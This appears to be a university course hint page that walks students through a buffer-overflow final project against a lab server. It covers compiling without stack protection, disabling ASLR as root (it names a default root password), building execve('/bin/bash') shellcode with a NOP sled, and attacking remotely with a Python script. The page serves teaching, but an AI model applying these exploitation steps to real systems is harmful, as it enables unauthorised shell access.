Hint for Final Project

2017-Fall Course Website

Advisor: Si Chen

The remote sever ( is running a vulnerable program (final1) on port 9999. The remote OS is 32-bit version Ubuntu. Now, we know the source code of this program is [this] So, we can first try to hack it locally. Here are some hints:

Step 1: Hack it locally

  • Disable ALSR and DEP and StackProtector when you compile the code: gcc final1.c -o final -m32 -fno-stack-protector -zexecstack
  • Check ASLR

    Type: cat /proc/sys/kernel/randomize_va_space If return 0, it means the ASLR have been turned off. Otherwise, we need to manually turn it off.

    check ASLR

    To turn off ASLR:

    Change to root user: su root, default password is chensi
    Then type: echo 0 > /proc/sys/kernel/randomize_va_space
  • The goal is to read flag.txt. In order to do that, you can first create a "fake" flag.txt file in your Manjaro VM. To make things easy, put both the vulnerable program (final) and the file "flag.txt" into the same folder
  • We cannot find any functions in final1.c which can be direct utilized to read flag.txt -- so write your own version (not in C but in hexdecimal and put it into your shellcode!)
  • P.S. in order to spawn a shell, you need to create a new execve("/bin/bash") function and represented it in hexadecimal. This link might be helpful: Link
  • Here is the basic shellcode's structure (based on what we learned from lab1)
  • We can do NOP sled to create a more "robust" one:
  • Now. Please try to write down the actual shellcode which can eventually generate new shell for you. (like the outcome of lab2)
  • Nothing happened?? The reason that it not prompt a shell is because you are running /bin/bash from the command line, and you are using the < to feed the shellcode from a file, the shell will immediately terminate when it reaches the end of input. If you want it to remain keyboard interactive, do this: cat shellcode - | ./final
  • You can use GDB to help you DEBUG your shellcocde. If your shellcode works, you can immediately type cat flag.txt and check the local file.

Step 2: Hack it remotely

  • Do the same thing, but this time we do it remotely .
  • Feel free to create your own Java program to send message to talk to this server, or, if you prefer, you can use this Python scipt [Link]
  • W() allows you to send "data" to remote sever, just like you type some data and hit enter key inside your VM's terminal
  • R() allows you to read the response from the remote server
  • You can try it by typing python2 attack.py in your terminal
  • Now, tweaking your shellcode and hack the remote server!
  • You probably need to use "Format String" vulnerability to help you exploit the remote memory address.